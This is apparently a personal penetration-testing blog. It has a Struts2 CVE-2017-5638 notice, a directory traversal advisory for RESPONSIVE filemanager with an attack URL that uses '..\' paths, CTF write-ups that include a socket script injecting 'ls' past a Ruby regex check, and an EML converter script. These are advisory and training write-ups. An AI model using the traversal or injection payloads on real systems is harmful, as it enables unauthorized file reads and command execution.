Kerz's Penetration Test.

Tuesday, 7 March 2017

Apache Struts2 (cve-2017-5638)

Becareful new Vulnerability Apach Struts2 (Cve-2017-5638).

How to Fix: upgrade to Struts 2.3.32 or Struts 2.5.10.1
Affected Version: Struts 2.3.5 - 2.3.31, Struts 2.5 - 2.5.10

POC:
https://github.com/tengzhangchao/Struts2_045-Poc

Thursday, 9 June 2016

RESPONSIVE filemanager <= 9.10.2 - Directory Traversal

RESPONSIVE filemanager <= 9.10.2 - Directory Traversal

Advisory: Directory Traversal in RESPONSIVE filemanager on Window Server

During a penetration test discovered a directory traversal vulnerability
in RESPONSIVE filemanager. Attackers are able to read arbitrary directory by specifying a
relative path.

Details
=======

Product: DRESPONSIVE filemanager
Affected Versions: RESPONSIVE filemanager v9.10.2
Fixed Versions: Not yet
Vulnerability Type: Directory Traversal
Vendor URL:
http://www.responsivefilemanager.com/
Software Link:
https://github.com/trippo/ResponsiveFilemanager/releases/download/v9.10.2/responsive_filemanager.zip
Vendor Status: fixed version released
Advisory URL: http://hacktizen.blogspot.com/2016/06/responsive-filemanager-9102-directory.html
Tested on: WINDOW SERVER
CVE: CVE-2014-2575
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2575

Attack Detail
[URL]/filemanager/dialog.php?editor=tinymce&type=&lang=&popup=0&field_id=&relative_url=0&akey=key&fldr=..\
fldr=..\..\..\

Monday, 14 March 2016

CODEGATE 2016: JS_is_not_a_jail

JS_is_not_a_jail
nc 175.119.158.131 1129

After connect the server, I try to "quit()" command.
It was occurred a error with the file path "/home/codegate/cg.js"

I can use a read() feature to read the code.

read('/home/codegate/cg.js')

FLAG:
easy xD, get a more hardest challenge!

Monday, 22 February 2016

Internetwache 2016 EXP50 Writeup

When I access the server ;188.166.133.53:12037.
It shows "Let me count the ascii values of 10 characters:".
I just input some text such as "test", Then it shows an error as below:
"WRONG!!!! Only 10 characters matching /^[a-f]{10}$/ !"

The Ruby has a vulnerability of regex. I code to get a Flag.

 import socket  
   
 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
 s.connect(('188.166.133.53', 12037))  
   
 print s.recv(1024)  
 print s.recv(1024)  
 s.send('ls\naaaaaaaaaa')  
 print s.recv(1024)  
 s.close()

Then, the server returns as below:

$ python test.py
Let me count the ascii values of 10 characters:

Sum is: 1203
IW{RUBY_R3G3X_F41L}

FLAG:
IW{RUBY_R3G3X_F41L}

Reference:
http://sakurity.com/blog/2015/06/04/mongo_ruby_regexp.html

Wednesday, 13 January 2016

List of all the security conference in 2015 (or older)

Wednesday, 26 August 2015

Python EML file viewer (simple version)

Sometimes, employees passes eml file to me for a reference or etc.
Unfortunately, I don't have an eml viewer....

So I just coded simply convert from eml file to html for only plain/text and that is in the base64.
When I searched python module for an eml converter, I am able to find out the "email" module.
But I need only simple version. :)

I hope it is helping your working. :)

 import re, base64  
   
 filename = "./1.eml"  
   
 num_lines = sum(1 for line in open(filename))  
   
 S = ""  
 with open(filename, "r") as f:  
   for i in range(0, num_lines-1):  
     if (re.findall("Content-Type: ", f.readline())):  
       i = i + 2  
       f.readline()  
       #print (f.readline())  
       if(re.findall("Content-Transfer-Encoding: base64", f.readline())):  
         f.readline()  
         while(1):  
           tmp = f.readline()+f.readline()  
           if (re.findall("\n\n", tmp)):  
             break  
           S = S+tmp  
 with open(filename+"_convert.html", "w") as con_f:  
   con_f.write("<b>CONVERT: ONLY PLAIN/TEXT</b><br /><br />\n")  
   con_f.write(base64.b64decode(S))

Monday, 18 May 2015

DEFCON 23 CTF Write up (Links)

Defcon 23 Quals Writeup

http://d.hatena.ne.jp/Kango/20150518/1431907470

http://lockboxx.blogspot.com/